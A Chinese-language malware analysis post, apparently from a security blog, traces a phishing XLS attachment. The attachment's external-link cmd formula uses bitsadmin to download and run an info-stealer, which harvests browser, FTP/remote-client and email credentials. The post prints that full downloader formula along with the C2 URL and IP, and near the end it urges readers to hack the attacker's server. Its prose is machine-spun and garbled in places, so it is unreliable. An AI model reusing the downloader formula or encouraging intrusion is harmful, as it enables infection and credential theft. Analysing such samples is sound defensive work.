快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

躲匿在邮件里的“坏小子”

*

不知从什么时辰最先,我的垃圾邮件最先暴增,而且主题千奇百怪,有“不再用去澳门赌博”、“免保人、免抵押”…等推行主题;有“南北方压岁钱差距有多大?”、“爱过才知道什么是痛”…的段子主题;也有“+我微信 dw178gg”、“加扣扣 2848116852”…的交友主题。

这些大部分都能从标题就能判定出来是垃圾邮件,像那种日文、繁体字糅杂在一块儿的邮件就很难辨别,每一次我都要点开看一看内里有什么。咳咳,言回正传,

这内里最让人头痛的照样躲匿在正常邮件里的病毒以及钓鱼欺诈邮件,这些“坏小子”们可不仅仅骗个点击而已,稍有不慎我们丧失的可能无比多…

1、基本信息

文件名 xx电子账单.xls
SAp56 61472720ecd1f63f92593e271c0f1220001d0b2fe32a5ce732eb55c7b19c4e50
文件名 SwiftCopy.exe
SHA256 db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5

这是我某个邮件中的 xls 文件,和关上表格后下载的可疑文件。拿到可疑文件第一时间照样扔到“捏造执行环境”中先让它本人可劲儿折腾一番,很快阐发讲演就出来了

图 1.jpg

很可惜,从沙箱讲演中看不出特别症结的信息,只能从举动上看出些许端倪,接下来需要我手动最先阐发了…

二、举动阐发

上手之前预备工作要做足,先梳理下贱程:

图 2.1.1.png

2.1 XLS 文件(Downloader)

原始样本是一个 xls 文件,首要功能是作为一个 downloader。此文件使用了外部链接功能,这是一种除宏,漏洞之外的另一种载荷投递的方式。关上文件后会提示你更新,点击更新后又会让你确定是否要启动 cmd 进程。

图 2.1.2.png图 2.1.3.png

点击文档中的 #REF!可以看到将要执行的命令行代码

=cmd|'
/c @echo Set objShell = CreateObject("Wscript.Shell") > Gm.vbs
& @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download http://www.mva.by/tags/SwiftCopy.exe
%temp%Gm.exe&%temp%Gm.exe",0,True >> Gm.vbs& Gm.vbs'!A0

样本会从 www.mva.by/tags 中下载 SwiftCopy.exe 存放到暂且目录下,然后运行。

2.2 SwiftCopy.exe 文件

使用 PEiD 查一下壳,显示为 ASProtect,我的脱壳手艺一塌胡涂,在网上找了一个 OD 的脚本,刹时脱壳,谢谢网友的分享,网友博客链接:https://blog.csdn.net/qingye2008/article/details/1898190

脚本名为 Aspr2.XX_unpacker_v1.osc,人人可以从网上搜索一下这个名字,应该可以搜到。

图 2.2.1.png

脱完壳以后是一个 Delphi 程序,其首要目的是创建自身并注入,然则要是不经过九曲十八弯的操作显示不出他的强盛,他会轮回调用自身中的一些函数,调用次数为 0x3B,这些函数中大部分没什么实质性的作用,然则万万不可大意,这些函数中还有反沙箱的操作,通过获得光标的值,判定光标是否在挪移,而且这个轮回会连续轮回 7 次。

图 2.2.2.png

终极样本会创建自身并注入,不用想,重点功能肯定在注入的这部分代码中。

2.3 子进程

待到父进程调用 ZwResumeThread 时附加到目标进程中,代码结构比较简单,要是参数中有-u参数,将会就寝一段时间。

图 2.3.1.png

值得一提的是,程序中调用的体系函数都是动态获得的,从而大大增添了静态阐发的难度。
图 2.3.2.png

此样本的重点功能就是信息窃取,可以说是至关的周全,轮回调用函数,可以看到轮回次数为 101,窃取的信息包含阅读器信息,邮箱信息,遥程上岸客户端信息等。
图 2.3.3.png

此时的程序已经没有了混淆,进入函数后就可以看到程序要窃守信息的目标。
图 2.3.4.png

对这些函数进行统计,获得的信息以下(可以说是至关周全)

阅读器类:

Internet Explorer,Mozilla Firefox,Google Chrome,KMeleon,Comodo Dragon,Comodo IceDragon,SeaMonkey,Opera,Safari,CoolNovo,Rambler Nichrome,RockMelt,Baidu Spark,Chromium,Titan Browser,Torch Browser,Yandex.Browser,Epic Privacy Browser,Sleipnir Browser,Vivaldi,Coowon Browser,Superbird Browser,Chromodo Browser,Mustan Browser,360 Browser,Cyberfox (x32+x64),Pale Moon,Maxthon browser,Citrio Browser,WEB黑客,Chrome Canary,Waterfox,Orbitum,Iridium,

读取阅读器的ini文件

图 2.3.5.png

读取登录数据
图 2.3.6.png

遥程登录客户端类:

TotalCo妹妹ander,FlashFXP,FileZilla,FARManager,CyberDuck,Bitvise,NovaFTP,NetDrive,NppFTP,FTPShell,SherrodFTP,MyFTP,FTPBox,FtpInfo,LinesFTP,FullSync,NexusFile,JaSFtp,FTPNow,Xftp,EasyFTP,GoFTP,NETFile,BlazeFtp,StaffFTP,DeluxeFTP,ALFTP,FTPGetter,WS_FTP,AbleFTp,Automize,RealVNC,TightVNC,Syncovery,mSecureWallet,SmartFTP,FreshFTP,BitKinex,UltraFXP,FTPRush,VandykSecureFX,OdinSecureFTPExpert,Fling,ClassicFTP,Maxthonbrowser,Kitty(login+privatekey),WinSCP,Re妹妹inaRDP,WinFTP,32BitFTP,FTPNavigator

获取用户名以及暗码

图 2.3.7.png

邮箱类:

Outlook,MozillaThunderbird,Foxmail,Pocomail,Incredimail,GmailNotifierPro,SNetzMailer,Checkmail,OperaMail,FossaMail,MailSpeaker,yMail

获取用户名以及暗码

图 2.3.8.png图 2.3.9.png

样本会根据不同的目标,通过不同的方式窃取数据,可见作者对这些信息至关熟识。

终极样本会将获得的信息发送到服务端,阐发此样本拿获到的 url 为 http://admino.gq/stan/ Panel/fre.php

此域名对应的 IP 为 103.63.2.227,通过情报社区查询,标签有垃圾邮件、钓鱼。红客大佬们可以尝试入侵入侵,看看攻击者截获了若干信息。

图 end.png

接着样本会在 Roming 目录下创建一个文件夹,并将自身拷贝过去,命名为 618D9F. exe,并且将文件属性配置为隐躲。

最后还将在一个无限轮回中创建线程,此线程会调用窃守信息的函数,删除目标文件,下载文件并执行。

3、总结

实在这些使用电子邮件以及主题吸取用户涉猎并关上附件,大部分是针对企业或构造。“坏小子”们伪装的方式无比多,潜在在一些 DOC、XLS、EXE 等常见的文件格式中也会让人放松警惕,一旦盲目关上或点击电子邮件中的链接,后果可能无比严重!最佳的办法就是不要关上他们,不要冒任何感染危害,除非你会使用沙箱产品或具备文件阐发的能力。

P.S. 这个样本功能齐全,信息量至关大,我也只阐发个皮毛,对这个样本感兴致的同伙们可下列载下来继续深度阐发,肯定能够学到很多知识。

讲演地址以下:

db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5

*

您可能还会对下面的文章感兴趣: